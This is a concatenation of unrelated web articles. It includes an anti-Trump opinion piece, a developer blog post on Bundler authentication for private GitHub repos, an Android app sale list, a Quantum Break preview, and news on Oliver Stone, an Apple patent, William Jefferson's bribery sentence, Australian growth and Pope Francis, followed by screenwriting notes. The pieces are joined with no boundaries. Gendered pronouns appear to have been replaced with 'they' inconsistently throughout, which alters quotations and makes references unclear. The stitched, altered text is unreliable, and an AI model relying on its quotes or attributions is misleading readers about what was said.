There is a lot to unpack in this quote. Put aside the fact that Trump's claim that ratings are “way down” for the NFL is completely false, and that Trump still does not seem to understand that the players are not actually protesting the anthem or the flag.
But the most revealing part was when Trump said they think the owners are “afraid of their players.”
Trump has trafficked in the ugliest kinds of stereotypes about people of color for years. They led the racist birther movement against President Barack Obama, accusing them of being “foreign” because of their name and skin color. They launched their presidential campaign by calling Mexicans rapists and criminals. They have smeared all Muslims, including American citizens, as dangerous.
And now they are sending a clear message that black athletes who silently kneel to protest policy brutality against their own communities are somehow threatening.
Trump and their base are clearly invested in this caricature of black men. It is yet another demonstration of Trump's lack of empathy and cuts to the heart of why, rather than taking the time to understand the causes and concerns that drove the protesting NFL players, their solution is simply to get those “sons of bitches” off the field and out of their sight.
Florian Munz, Co-Founder at Depfu
02 August 2017 , Co-Founder at Depfu
As soon as you start using private Github repos in your Gemfile you have to figure out how Bundler can access them. This is super easy on your local machine, as Bundler just uses your credentials, so if you can access the repo, so can Bundler.
Things get a bit trickier when you want to use a CI service like Travis or when you want to deploy your app to production.
Since we needed to support private dependencies in Depfu I looked at how to implement it and was actually surprised how many different ways there are. Let's have a look:
Let's transport some Git
There are 3 different transport mechanisms you can use for your Git repos:
GIT gem 'rails', git: 'git://github.com/rails/rails.git' SSH gem 'rails', git: 'git@github.com:rails/rails.git' HTTPS gem 'rails', git: 'https://github.com/rails/rails.git'
To get this out of the way first: don't use the git:// protocol. It's insecure and allows a man-in-the-middle attack. Also, don't use the github: shorthand, as it uses the Git protocol until Bundler 2.0.
That leaves us with HTTPS and SSH for specifying your private Git dependencies.
Using SSH
I think most people are familiar with how SSH works together with Bundler since there is a long history of using SSH: The SSH transport was the first one Github supported. Travis integrates with your code via SSH by default. And of course Capistrano is based on SSH.
In order for SSH to work with Bundler, the user executing bundle install needs to have an authorized private key for the Github repo. Github allows multiple keys to be associated with a single user account or with a single repo (deploy keys). Deploy keys sound great, but their use is complicated by the fact that GitHub does not allow you to reuse keys. So a single private key cannot access multiple Github repositories, which makes it quiet hard to use with private dependencies.
Since you usually don't want to tie your CI or deploy to your own Github user account, a common pattern is to use a machine user: A newly created Github user that has read access to all the repos it needs access to, but it's only used by your deployment scripts.
Using HTTPS
Git's support for HTTPS with private repos is newer than SSH, but it has been around for quite some time now. Still, this is where I was the most surprised how useful it has become.
If you're using HTTPS with private repos, Github requires you to supply your auth info using basic auth. By default, it asks for your username and password:
$ git clone https://github.com/username/repo.git Username: your_username Password: your_password
Instead of using your password, you can also use use personal access tokens. The advantage to using a token over your password is that a token can be revoked and you can define what permissions it gets. Also if you use 2FA on your Github account, you have to use tokens when using HTTPS.
So how can you let Bundler know about how to authenticate?
Manual every time
If you just put a private repo in your Gemfile, Bundler will actually ask you for the username/password every time you run bundle install . That's quite annoying and also doesn't really work on Travis or when deploying.
Directly in the Gemfile (don't do this)
gem 'private' , git: 'https://<username>:<password>@github.com/mycompany/private.git' gem 'private' , git: 'https://x-access-token:<token>@github.com/mycompany/private.git'
Adding it directly to the Gemfile makes clear what's going on, but you're committing sensitive information to your source code, which you really shouldn't. And no, using a token here doesn't really make it much better than username/password.
bundle config
You can configure Bundler with a few options, which it stores in a file. Bundler gets its configuration from the local app (app/.bundle/config), environment variables, and the user's home directory (~/.bundle/config), in that order of priority.
You can add authentication information to it like this:
$ bundle config GITHUB__COM username:password $ bundle config --local GITHUB__COM username:password
This takes your username/password out of the source code, but it's stored in cleartext on your computer. Also you still have to tell your servers and Travis about this.
bundle config with environment variables
Bundler actually allows all config options to also be set via environment variables:
$ export BUNDLE_GITHUB__COM=username:password
Or if you're using personal access tokens
$ export BUNDLE_GITHUB__COM=x-access-token:<token>
This technique works really well with Travis and Heroku, since they allow environment variables to be stored securely.
⚠️ Github also allows <token>:x-oauth-basic as the username/ password for basic auth, but it's not recommended anymore since not all tools are hiding the token in their output. So it could end up in your logfiles.
Caching your credentials
This is a less known technique that you can use locally on a Mac. Instead of Bundler (or Git) asking you every time for your username and password, you can store them in your macOS keychain. So you'll be only asked the first time and all further checkouts will use the cached credentials.
It's quite easy to set up and brings the HTTPS transport to the same level as SSH from a convenience point of view.
Putting it all together
In the past I usually relied on the SSH transport for everything: How we clone our main repo and how we specify private Git dependencies.
But I feel that HTTPS is on the same level now when using environment variables for CI/Heroku and caching credentials locally. While the granular permissions for personal access tokens don't add a lot of benefit in this case, tokens do feel a little bit easier to manage than SSH keys.
It's time for a good old fashioned non-denominational holiday celebration here at Android Police HQ. What better way to celebrate the season than with some apps and games – and at reasonable prices. The holidays are expensive enough without paying full price for apps, right?
Apps
Servers Ultimate Pro – $1.99 from $8.99
Lightning Launcher eXtreme – $0.99 from $2.99
Buy Me a Pie! Grocery List Pro – $1.00 from $2.99
Flipps HD – $0.99 from $4.99
RepetiTouch Pro (root) – $0.99 from $5.49
Jota+ PRO-KEY – $1.98 from $3.99
Calls Blacklist PRO – $0.99 from $2.99
FiiNote Full function Key – $8.60 from $17.20
MediaHouse-Pro UPnP/DLNA – $1.99 from $3.99
Day by Day Organizer – $2.99 from $4.99
PlayerPro Music Player – $2.50 from $4.95
Paper Camera – $0.99 from $1.99
SwiftKey Keyboard – $1.99 from $3.99
Camera ZOOM FX – $1.49 from $2.99
Runtastic Sit-Ups PRO – $0.99 from $1.99
Groovy Notes for Tablets – $2.99 from $4.99
Runtastic Heart Rate PRO – $0.99 from $1.99
Moon+ Reader Pro – $2.49 from $4.99
AIDE Premium Key – $4.97 from $9.99
Boat Browser Pro License Key – $2.58 from $3.99
Dayframe Prime – $1.99 from $4.99
HD Widgets – $0.99 from $1.99
$5 free to spend on apps from Amazon
WiFi Mouse Pro – $1.99 from $2.99
Business Calendar Pro – $2.49 from $4.99
PDF Max – $1.77 from $6.99
RawVision – $1.37 from $5.31
Alarm clock PRO – $0.99 from $1.59
Ab workout A6W PRO – $0.99 from $1.49
Hourly chime PRO – $0.99 from $1.49
Mobi Calculator PRO – $1.75 from $3.49
Volume Ace – $0.99 from $1.99
C Locker Pro – $1.25 from $2.49
Touch Calendar – $1.31 from $2.95
Easy Voice Recorder Pro – $0.99 from $3.99
ezPDF CLEAR PDF Quiz – $0.99 from $4.99
ezPDF Reader – $0.99 from $3.99
Camera 2 – $0.99 fro $2.99
Pixel Fleet – $0.99 from $1.99
Holo Launcher Plus – $1.99 from $3.99
Holo Locker Plus – $0.99 from $1.99
Minuum Keyboard – $1.99 from $3.99
ElectroDroid Pro – $1.90 from $2.69
Amazon Christmas Day Deals (Apps and Games)
Locus Map Pro – $4.37 from $8.27
NRG Player Unlocker – $1.49 from $4.99
OfficeSuite Pro 7 – $0.99 from $14.99
Redirect File Organizer Pro – $1.00 from $2.00
Timely – $0.99 from $3.99 (in-app purchase)
CWMoney EX Expense Track – $1.99 from $4.99
Notif Pro – $0.99 from $1.49
Paper Artist – $0.99 from $2.99
Android Assistant – $1.29 from $1.99
IM+ Pro – $1.99 from $4.99
Zombies, Run! – $2.99 from $3.99
Screenshot Ultimate Pro – $0.99 from $3.00
eWeather HD – $0.99 from $3.99
Games
Flick Golf! – $0.99 from $2.31
Kingdom Rush Frontiers – $0.99 from $2.99
Sonic The Hedgehog 2 – $0.99 from 2.99
N.O.V.A. 3 – $0.99 from $6.99
Draw a Stickman: EPIC – Free from $1.99 (Amazon app of the day)
Where's My Mickey? – $0.49 from $1.99
Where's My Mickey? XL – $0.49 from $2.99
Toy Story: Smash It! – $0.49 from $1.99
Flick Soccer! – $0.99 from $2.31
Where's My Perry? – $0.49 from $1.99
Pettson's Inventions – $1.07 from $2.67
Pettson's Inventions 2 – $1.07 from $2.67
NFL Quarterback 13 – $0.99 from $2.15
Reiner Knizia Tigris&Euphrates – $0.99 from $2.84
Flick Nations Rugby – $0.99 from $2.31
JellyCar 3 – $0.49 from $1.99
Sonic & SEGA All-Stars Racing – $0.99 from $1.99
Breach & Clear – $0.99 from $1.99
Wreck-it Ralph – $0.49 from $1.99
Temple Run: Brave – $0.49 from $1.99
Monsters University – $0.49 from $1.99
Sonic The Hedgehog – $0.99 from $2.99
Flick Golf Extreme – $0.99 from $2.31
Pixel Defenders Puzzle – $0.99 from $1.99
Sonic CD – $0.99 from $2.99
Temple Run: Oz – $0.49 from $1.99
Where's My Water? – $0.49 from $1.99
Monsters, Inc. Run – $0.49 from $1.99
John GBC – Game Boy – $2.00 from $3.49
John NES - NES Emulator – $2.00 from $3.49
John GBA - Game Boy(GBA) – $2.00 from $3.49
Syder Arcade HD – $0.99 from $1.97
Containment The Zombie Puzzler – $0.99 from $1.99
Worms 2: Armageddon – $0.99 from $4.99
Anomaly 2 – $1.99 from $4.99
Ticket to Ride – $1.99 from $6.99
Sparkle 2 Evo – $0.99 from $2.99
Kingdom Rush – $0.99 from $1.99
Joe Dever's Lone Wolf – $1.99 from $4.59
Iesabel – $0.99 from $5.99
RPG Spectral Souls – $5.77 from $12.83
SRPG Generation of Chaos – $5.77 from $12.83
RPG Blazing Souls Accelate – $5.77 from $12.83
Pivvot – $1.99 from $2.99
Star Wars Pinball 2 – $0.99 from $1.99
FINAL FANTASY III – $7.99 from $15.99
FINAL FANTASY IV – $7.99 from $15.99
FINAL FANTASY V – $7.99 from $15.99
Modern Combat 4: Zero Hour – $0.99 from $6.99
Need for Speed Most Wanted – $0.99 from $1.99
Sword & Sworcery – $1.99 from $4.99
FINAL FANTASYII – $7.99 from $15.99
FINAL FANTASY DIMENSIONS – $7.99 from $15.99
Frozen Synapse – $1.00 from $3.22
Batman: Arkham City Lockdown – $0.99 from $5.99
EPOCH – $0.99 from $2.99
CHAOS RINGS – $2.99 from $7.99
CHAOS RINGS II – $3.99 from $15.99
CHAOS RINGS Ω – $2.99 from $8.99
The Great Fusion – $1.49 from $1.99
Touch Pool 2D – $0.99 from $1.99
THE GAME OF LIFE – $0.99 from $4.99
Winnie The Pooh Puzzle Book – $0.49 from $1.99
TowerMadness – $0.99 from $2.99
Call of Duty: Strike Team – $2.99 from $6.99
Jnes (NES Emulator) – $1.99 from $2.99
Gangstar Vegas – $0.99 from $6.99
Quell Memento – Free from $2.99 (Amazon app of the day)
Prince of Persia Shadow&Flame – $0.99 from $2.99
Kakuro Puzzles – $1.99 from $2.99
Star Command – $0.99 from $2.99
Eufloria HD – Free from $4.99 (Amazon app of the day)
Eufloria HD – $2.99 from $4.99
Cogs – Free from $2.99 (Amazon app of the day)
Fieldrunners HD – $0.99 from $2.99
Fieldrunners 2 – $0.99 from $2.99
When the Xbox One was revealed back in May 2013, the first exclusive we heard about was a game titled Quantum Break. Details were thin back then, but it was apparent that Remedy, the developer behind the critically acclaimed Alan Wake series, was aiming to do something drastically different with Quantum Break.
Originally scheduled for a 2015 release according to Polygon, Quantum Break was delayed till 2016 to give the developer more time with the title. The game melds action gameplay with the storytelling of a live-action television show. Since its first gameplay reveal till now, Quantum Break has been an intriguing title, one that many Xbox One owners, and now Windows 10 PC users, are itching to get their hands on. Warning to those reading: This article may contain some slight story spoilers.
So how do the early moments of Quantum Break hold up? They definitely keep you yearning for more, that's for sure.
Quantum Break pits you as Jack Joyce (played by Shawn Ashmore), who is fighting to save the future before time runs out — literally. With Quantum Break, your actions have discernible choices on the way the game plays out, which your first taste comes with Act 1 of the game. After an explosion at the university lab, Jack and their brother William (played by Dominic Monaghan of Lost and The Lord of the Rings fame) are trying to escape Monarch's pursuing troops. Although you're not entirely sure who they are, they make it readily apparent you're their target. Jack begins to showcase they have gained some sort of power over time, which definitely comes in handy as you move your way to William's car.
However, it's in these early moments that if you're a stickler for resolution, you might want to brace yourself. Quantum Break is a sub-1080p game in 2016. Digital Foundry did their analysis of what is called by Remedy to be “final code” and their findings consistently found Quantum Break to be running at 720p. I realized this myself early on as I played, mostly due to the incredibly soft textures and character models, as well as incredibly noticeable aliasing when the game is in motion. Although Remedy has yet to address the findings of Digital Foundry publicly, nor have they responded to my request for comment before publication, Xbox boss Phil Spencer has implored gamers to try it for themselves before pre-judging the game.
null
There are many who have been optimistic that the proverbial “Day 1” patch would bring the resolution of the game to 1080p, but Remedy's Head of PR Thomas Puha has also put that down, stating that they “never said that.” In fact, the title patch released a few days ago for reviewers, and it definitely did well to improve some gameplay stability issues early on, but graphically the game is the same.
null
[UPDATE] – Remedy has replied back regarding the 720p output of Quantum Break with the following statement:
Quantum Break's 1080p output is a temporal reconstruction from four previous 720p 4xMSAA frames. This approach gets us high pixel quality in combination with complex shading and effects, allowing us to achieve a cinematic look. However, varying sample counts between passes and temporal upscaling makes talking about resolution, as it is traditionally understood, complicated in the case of Quantum Break. Since the start of “Quantum Break's” development, the most important thing for Remedy and Microsoft has been delivering a compelling gaming experience with superior artistic quality. This is what Remedy is renowned for. We're confident that we have achieved this, and can't wait to hear what fans think on April 5 when they play the game.
All of this aside, the art direction Remedy has taken with Quantum Break is definitely beautiful. The game truly has a filmic look, one that matches the look and feel of the Live Show that accompanies the game. Additionally, cutscenes are well detailed, with Quantum Break showing off some great character model work on all of the actors. For the most part, the people you see take a prominent or lead role in the live show are beautifully rendered in-game as well.
As you move through the university in this first area, you're starting to learn your time powers piecemeal. Quantum Break is a cover-based shooter, but you don't “stick” to cover as you do in other games of its type. This is both a great thing — and a bad thing. On one hand, you can move freely around, never feeling as though you cannot maneuver due to being, well “stuck” to a wall or something. On the other hand, it is a bit harder to scramble for cover — and then adequately get behind cover once you're there. Shots still manage to find home from Monarch's lackeys even when crouching behind a pretty solid wall.
Quantum Break's gameplay draw, though, are those time powers. Time Stop allows you to encase an enemy or object in a bubble of frozen time. Riddling that bubble with bullets and then watching everything fall into place when the bubble collapses is one of the most satisfying things in Quantum Break. It never gets old. Additionally, you can use your time manipulation powers to dodge incoming attacks or quickly get behind cover. You also learn a time shield, which blocks you from incoming bullet fire as well as knocks back any poor unfortunate soul who happens to be nearby you.
Quantum Break definitely opens with a ton of action, but it also presents some of the game's early choices, which will make you want to revisit and relive. I won't spoil anything, but these early choices have the ability to define much of your experience moving forward and do alter how the Live Show plays out. Speaking of Quantum Break's Live Action Show, this is where Quantum Break really sets itself apart from other action games. Most other games tell their story through an interweaving of gameplay and cutscenes, which Quantum Break does. However, rarely do games show the other side of the story, the true motivations of your enemy. Quantum Break does this, and it gives a whole new appreciation of what's going on in the early stages.
Early on, Quantum Break definitely is intriguing. However, the 720p render target is a disappointment, especially in 2016. However, if you can get past that initial disappointment, Quantum Break's opening act does leave you wanting to learn more. As you look over the scene as Paul Serene (played by Aidan Gillen of Game of Thrones), it settles in that Remedy's penchant for storytelling is in full force while the opening act comes to a close.
Looking forward to Quantum Break? Sounds off with your thoughts in the comments below.
[Image via Microsoft]
The outspoken film-maker hails the whistlebower as a 'hero' at Czech film festival and claims that 'the United States has repeatedly violated the fourth amendment'
Oliver Stone, never one to run scared from a controversy, yesterday waded into the ongoing NSA debate, defending the American whistlebower Edward Snowden and hailing them as a "hero" for exposing the US's mass surveillance programme.
"It's a disgrace that Obama is more concerned with hunting down Snowden than reforming these George Bush-style eavesdropping techniques," the Oscar-winning director told audiences at the Karlovy Vary international film festival in the Czech Republic.
Snowden, 30, is living in a transit zone in a Moscow airport where they are seeking asylum from federal prosecution in the US.  They are believed to have applied for asylum in 20 countries - thus far without result. In the meantime, their revelations have sparked a diplomatic crisis. In the past few days both the German and French leaders have described the NSA's surveillance program as "unacceptable".
"To me Snowden is a hero because they revealed secrets that we should all know, that the United States has repeatedly violated the fourth amendment," Stone said. "He should be welcomed and offered asylum. But they have no place to hide because every country is intimidated by the United States."
Stone, 66, was at the festival to unveil episodes of their new Showtime TV series, Oliver Stone's Untold History of the United States, as well as the extended "ultimate" cut of their unloved 2004 epic Alexander.
The film-maker's vocal support for Snowden is entirely in character. In recent months Stone has also thrown their weight behind WikiLeaks founder Julian Assange, visiting the activist at their base at the Ecuadorian embassy in London and criticising the depiction of Assange in two upcoming Hollywood pictures. "Julian Assange did much for free speech," Stone has said. "And they are now being victimised by the abusers of the concept."
While those of us who would happily trade thinner iPhones for better battery-life may be in the minority, even fans of ultra-thin phones expressed disappointment at the camera bump in the iPhone 6 and 6s. The problem Apple faced is that the laws of physics determine just how thin you can make a sensor and lens arrangement for any given aperture while retaining quality. But a patent application originally filed in 2013, continued last July and granted today could provide a solution.
Instead of the usual flat sensor, the patent describes a ‘spherically curved photosensor' that would allow the distance between the lens elements and the sensor to be reduced, allowing for a thinner camera module …
NordVPN
The patent describes the conflict you normally get between thin camera modules and image quality.
The advent of small, mobile multipurpose devices such as smartphones and tablet or pad devices has resulted in a need for high-resolution, small form factor cameras for integration in the devices. However, due to limitations of conventional camera technology, conventional small cameras used in such devices tend to capture images at lower resolutions and/or with lower image quality than can be achieved with larger, higher quality cameras.
By making the sensor curved to match the spread of light from the lens array, it can be brought much closer to the rear lens element than would normally be possible. The patent references a similar technique employed in astronomical telescopes.
An image captured in this way would normally suffer from a form of distortion known as chromatic aberration, but Apple proposes an additional lens element to correct this.
As always with Apple patents, there is no way to tell whether or not it will ever be used, but given that the camera lens protruding from the iPhone casing must have caused Jony Ive to have sleepless nights, this – or an alternative solution to the problem – seems more likely than not to make it into a future iPhone.
- WWE Superstar Ezekiel Jackson, who has been out of action for over a year with an injury, wrote the following on their Instagram today:
"In July 2008 I made my #smackdown television debut with "Thee Brian Kendrick" much love to TBK for seeking me out and choosing me. I was fulfilling a dream I had as an 8 yr old kid who saw and fell in love with professional wrestling for the first time through my neighbors window in #Guyana South America On April 6th 2014 my contract expired so #WrestleMania 30 was #bittersweet. I thank God for all the blessings he's bestowed upon me in the last 7 years. In my time in the #wwe I became the last #ECW Champion and a one time Intercontinental Champion
"I've also traveled the world given the opportunity to do what I love. Encountering some of the most passionate and reliable fans in the world I am deeply appreciative to Vincent McMahon and the #WWE for allowing a snotty nose lickle bai from Victory Valley Linden Guyana to live out my childhood dream on the highest level. #Godspeed to the company and all of my friends and colleagues. #beblessed Extremely excited about the next chapter in my life. I'm looking forward to this new season . I'm still 290 pounds and #healthy. I can be reached for bookings, sponsorship and signings through my manager at: [email protected] #Godbless"
Former Rep.
was sentenced Friday to serve 13 years in prison for what the lead prosecutor described as "the most extensive and pervasive pattern of corruption in the history of Congress."
While the sentence by federal Judge T.S. Ellis III fell well short of the
recommended by the government, it is by far the stiffest jail term ever imposed on a member or former member of Congress for crimes committed while in office.
Jefferson, 62,
, including soliciting bribes, depriving citizens of honest service, money laundering and using their office as a racketeering enterprise.
They were acquitted of five other charges in a case that famously featured the revelation that they had hidden $90,000 in the freezer of their home, marked bills from the FBI that prosecutors said was going to be used as a bribe.
Jefferson stood stoically as the sentence was read, their head cocked slightly to the left, showing no obvious emotion.
The judge also ordered Jefferson to forfeit the $470,653.47 the jury had determined was funneled to shell companies under their family's control through their bribe schemes.
Jefferson was not immediately taken into custody, as prosecutors had requested. Instead the nine-term Democratic member of Congress was released pending a hearing Wednesday at which Ellis will hear arguments on whether Jefferson is a flight risk and should be sent directly to prison. Their attorneys have asked that they be allowed to remain free on bond while they appeal their conviction, which is unlikely.
Barring that, lead attorney Robert Trout is asking that Jefferson be allowed to turn themselves to authorities Jan. 4, which would be routine in a case of this sort, and would allow them to spend Christmas with their family.
Jefferson does not have to appear at Wednesday's hearing, but if the judge approves the prosecution's request, the former member of congress would have to report immediately. Ellis agreed to recommend Jefferson be assigned to a low-security prison "camp." Trout specifically recommended the federal prison in Pensacola, Fla., but Ellis said only that they would recommend a facility close to New Orleans.
Jefferson has 10 business days to file an appeal, which Trout said they would do.
Just as they did not testify in their own defense at their trial, Jefferson did not speak before sentencing. Trout explained to Ellis that "we are going to appeal and I have advised my client they would be best served by not discussing the facts of the case or making any statement to the court."
The only words Jefferson uttered before the court Friday were a quiet "yes" when Ellis asked them if they had read their pre-sentencing report, and again when they were asked whether they were satisfied with their legal representation.
Before passing sentence, Ellis said they did not fault Jefferson for not speaking before the court "under the circumstances," and, "I don't have any doubt you regret some of the conduct" that led to their conviction.
But Ellis said that "public corruption is a cancer that needs to be surgically removed," and that their sentence had to serve as a "beacon" to all about the price to be paid for compromising the public trust.
"I have no doubt you have led an extraordinary life; you have accomplished a great deal," Ellis said to Jefferson, who stood before them in a dark suit and blue shirt. "It makes this even all that much sadder for me and many others.
"Obviously you are a man of great gifts. It is a tragedy these gifts have been squandered."
The 13-year sentence represented an ignominious end for Jefferson, who rose from the humblest beginnings in the small northeast Louisiana town of Lake Providence to attend
Harvard University. They went on to become the first African-American to represent Louisiana in Congress since Reconstruction and a senior member of the powerful Ways and Means Committee.
They raised five daughters, each with undergraduate and graduate degrees from prestigous universities.
The daughters, sitting alongside their mother on the front bench behind the defendant, and accompanied by Jefferson's brother, Archie, remained impassive during the proceeding, which lasted three hours.
In the rear of the courtroom, seated in a corner of the last bench, were two jurors, one of whom was left teary by the proceedings.
Asked outside the courtroom before the sentencing how their brother was maintaining their composure, Archie Jefferson replied: "Faith."
The previous longest sentence for congressional corruption was eight years, four months meted out in March 2006 to former Rep. Randy "Duke" Cunningham of California, who pleaded guilty to taking $2.4 million in bribes to help military contractors win government contracts. Ellis said that Cunningham's disgrace had hit them especially hard because they were both Navy aviators. "There must be some kind of greed virus affects those in power," the judge said.
In their remarks to the court, Trout said that while Jefferson had been found guilty of bribery, their case did not involve selling their vote or obtaining a legislative earmark.
"Not all bribery cases are alike," said Trout, who said that in their mind, Jefferson "always thought that they kept to the right side of the law," and that the help they delivered in arranging business deals in Africa in exchange for payments to family-owned businesses, was not an "official act" covered by the bribery statute.
The question of what is an official act promises to be at the center of Jefferson's appeal.
Trout also ridiculed the government's assertion in its sentencing memo that the defendant and their family stood to gain more than $500 million in cash, stock and equity interests through Jefferson's various deals.
"This was no $500 million bribe scheme," said Trout, suggesting that Jefferson's take, beyond the nearly half million assessed against him, was "more likely to be zero as anything else, and for the most part, that's how the facts bore out."
But chief prosecutor Mark Lytle and Ellis said that Jefferson clearly had far larger dollars signs in their eyes.
"You're not expecting me to believe that they didn't expect to get more than $478,000 out of this, do you?" Ellis asked.
Unresolved Friday was whether Jefferson was actually convicted of any crime related to the $90,000 that was found hidden in their freezer when the FBI raided their Washington home in August 2005. The FBI and prosecutors believe Jefferson intended to deliver the money as a bribe to Atiku Abubakar, who was then vice president of Nigeria, which would violate the Foreign Corrupt Practices Act. They were acquitted of the direct charge of violating the act, but convicted of a conspiracy count which may or may not have involved the act. Ellis said because they failed to make the jury form more specific, that question will never be resolved.
Trout argued it was plain that the jury did not find Jefferson in violation of the act -- they would be the first public official convicted under it -- and Lytle said it was just as plain to them and to anyone who watched and listened to the tapes played in the trial, that Jefferson had violated the act, and the jury had found them guilty of conspiring to violate it.
In a statement after the sentencing, Neil MacBride, U.S. attorney for the Eastern District of Virginia, said, "Mr. Jefferson is well-known for the $90,0000 found in their freezer. It is our hope that they will now be well-known for the tough sentence handed down today, showing that no one -- including our elected officials -- are above the law."
Harry Rosenberg, a former U.S. attorney in New Orleans, now in private practice, said that "a 13-year sentence to a federal prison is never good news but Jefferson got a major break today when Judge Ellis departed downward from the federal sentencing guidelines."
"Both sides can claim a victory," said Rosenberg, noting that the court had handed down "the longest sentence meted out to a convicted Congressman," without issuing what would have amounted to a "death sentence."
Jonathan Tilove can be reached at jtilove@timespicayune.com or 202.383.7827. Bruce Alpert can be reached at balpert@timespicayune.com or 202.383.7861.
Last week the treasurer Scott Morrison told an audience in the USA that not only would interest rate cuts no longer have any impact in Australia, but neither would any fiscal stimulus. It was an extraordinary statement at a time when the outlook is for below average growth.
The treasurer has resorted to faith in the private sector to solve our problems while at the same time saying the private sector is not investing.
It's almost become a cliché to talk about the new normal of low economic growth since the GFC, but we shouldn't become accepting of it.
The reality is, what we are experiencing now is abnormal growth compared to what we have experienced at any time since the second world war.
This week US economist Narayana Kocherlakota posted an interesting graph trying to explain why so many Americans feel poor.
They looked at the 10 yearly change in GDP per capita since the second world war.
Scott Morrison warns resentment to free trade and immigration threatens economy Read more
Now I am perhaps the number one ticket holder of the “GDP does not tell us everything club”, but the growth of American GDP per capita over the past decade is quite stunning.
When GDP is growing well, there can still be larger sections of the economy doing badly, but when it is growing slowly there is rarely any hidden “good news” – and certainly none relating to the poor sections of society. And GDP per capita is a good rough guide for national living standards.
Kocherlakota found that since the second world war, American GDP per capita had never grown by less than 10% in any 10-year period. And yet since 2009, 10 year growth has never been above that rate:
It is a dramatic display of what the IMF talks about when it suggests advanced economies in the world are experiencing subdued growth.
The ABS doesn't have quarterly GDP per capita data before 1973 so we can't do the same times series for Australia, but we can compare the 10 year growth since 1983:
While living standards here have not slowed as fast as in the USA, it is worth noting that the current 10 year growth in GDP per capita is slower than any time since the horror recession in 1982-83.
Now of course looking at 10-year intervals can also hide a lot – in 2006 our economy was booming. So a look at five-year intervals might reveal a bit more:
This measure certainly shows the depth of the USA recession, and how Australia missed out on those horrors. But even still, the past five years has seen our living standards grow at a level more associated with a recession than either an average or strongly growing economy.
More surprisingly, in the past five years, Australian and USA GDP per capita has grown by the same amount. That is because while currently our GDP per capita is growing faster, for most of the past three years, and even going back to 2010, that has not been the case:
Other than being a nice little history lesson, that would be interesting, but when we look at where the IMF has us projected to be up to 2021, it looks like the past five and 10 years are not an aberration, but the start of a trend:
The IMF would have Australia's GDP per capita not growing above 2% in any one calendar year in the next five years – a stretch we haven't experienced any time since the second world war.
So what is our treasurer's response?
Well it is clear from the speech Scott Morrison gave they want to get investment going – their speech was essentially an advert to foreign investors.
But the speech also touched on specific ways to get growth going. They made a good point – namely that with interest rates so low, monetary policy is basically done.
The RBA has been saying this for a long while now (and so have I). But Morrison then went further. They argued that “while so much of the global economic discussion focuses on monetary and fiscal stimulus, we believe that these options have largely exhausted their effectiveness, at least from an Australian perspective.
Astonishingly our treasurer is telling the world that the two biggest tools available to spur growth no longer work.
How's that for an invitation to come invest?
The new normal: why we need to shake up economic policy | Greg Jericho Read more
Instead they believe private investment (despite also admitting investment is not responding in this environment) will do the trick and so too will “trade”.
Now trade is certainly good for economic growth, but anyone believing the Trans Pacific Partnership (which is now unlikely to go forward) or our free trade agreements will do much (if anything) to improve growth are really off with the fairies.
At best (the very best) the impact will be marginal.
Morrison also suggests that their “10-year enterprise tax plan” will help work wonders. Except their own treasury modelling suggests the majority of the benefits will only come once the full cut to 25% occurs for big businesses – and that isn't scheduled to occur until 2026-27.
It's all pretty lame, and fairly despairing if you were hoping that the new normal might be abnormal.
TORONTO, May 29 (UPI) -- Pope Francis' statement that "even the atheists" are redeemed by God does not change that "salvation comes from Christ," a priest with Vatican press ties said.
People who "know" the church teaching that being a Roman Catholic is "necessary for salvation ... cannot be saved" if they "refuse to enter [the church] or remain in her," said the Rev. Thomas Rosica, who runs Canada's Catholic Salt + Light Television and served in the Vatican press office during the Benedict XVI-Francis transition.
But people "who through no fault of their own do not know the Gospel of Christ and their church but sincerely seek God and, moved by grace, try to do their will as it is known through the dictates of conscience can attain eternal salvation," said Rosica's "explanatory note."
"No person is excluded from salvation simply because of so-called original sin; one can only lose their salvation through serious personal sin of their own account," they added.
Rosica, a priest of the Congregation of St. Basil order, also made clear from where the church teachings on salvation come.
"All salvation comes from Christ, the head, through the church, which is their body," Rosica said in their note, published by Zenit, an "independent" Vatican-supported news agency that describes itself as "The world seen from Rome."
Francis made headlines when they said in a May 22 homily: "The Lord has redeemed all of us, all of us, with the blood of Christ -- all of us, not just Catholics. Everyone!
"'Father, the atheists?'" Francis said as if asking himself. "Even the atheists. Everyone!" Francis said in answering their Socratic-style question.
"And this blood makes us children of God of the first class!" Francis said. "We are created children in the likeness of God, and the blood of Christ has redeemed us all! And we all have a duty to do good. And this commandment for everyone to do good, I think, is a beautiful path towards peace.
"If we, each doing our own part, if we do good to others, if we meet there, doing good, and we go slowly, gently, little by little, we will make that culture of encounter -- we need that so much. We must meet one another doing good," Francis said.
"'But I don't believe, Father. I am an atheist!'" Francis said, again speaking as if they were someone else.
"But do good -- we will meet one another there," Francis said in response.
A reader for the Nashville Film Festival screenplay competition, Cheryl Laughlin gophers for indie sets throughout NorCal and performs grass roots marketing for micro-budget documentaries via 20KFilms. Follow Cheryl on Twitter @cheryllaughlin.
Click to tweet this article to your friends and followers!
Microbudget screenwriting fascinates me. Maybe it's the uber thriftiness, maybe it's the minimalism. Or maybe it's because when I daydream about my script getting made, I dream in the $35 million Trainwreck range. And while I'm dreaming (i.e., procrastinating), sometimes I negotiate down to $9 million (Zoe Kazan Ruby Sparks, yes please). Okay, you twisted my arm, a cool $5 mil it is…. I'm in good company with The Way Way Back, right?
But even a few million is a big-budget studio film by comparison to the films being made on microbudgets. While the numbers swing pretty wide, most sources agree that shy of $500K is microbudget. Actually, I love this 2014 survey from Stephen Follows of 524 film industry business pros in the UK that pegs the average at $396,000.
Any more than that and maybe you've gone Hollywood. (Well, mini Hollywood but still living with your three roommates in a basement apartment in Reseda while hoping one of them is the next Judd Apatow to coattail you to full Hollywood.)
So I decided to dig in and learn more of the ins and outs of writing for a microbudget feature film. That's when I stumbled upon indie writer/director/producer Terrell Lamont, a Denver-based filmmaker currently screening their first microbudget feature film, Hush Money.
Sidenote: Apparently Denver is ramping up as an indie film incubator. When I lived there, not so much. So, look out Northern California. If I ever leave, a bona fide bump in filmmaking is sure to follow.
Push the Writing Limits of the Microbudget Film
Lamont aptly calls their production company gritHouse Films, and he's known from the getgo they want to write for the microbudget and springboard from there into bigger budget fare. “You are richer than you think,” says Lamont. “Think about your network and which people can get behind your vision.”
That vision for Hush Money, a limited-location crime drama, was written and made for under $100K. Lamont originally wrote only one location with interiors and exteriors of a house, inspired by Steven Knight's Locke script featuring actor Tom Hardy in their car. But just one location proved too constraining for a crime drama.
The script eventually expanded into seven locations with a main location being their home. (Luckily, they had understanding neighbors who didn't call 9-1-1 on the fake cops being filmed outside their house.) They wrote for two main characters joined by no more than 10 minor characters.
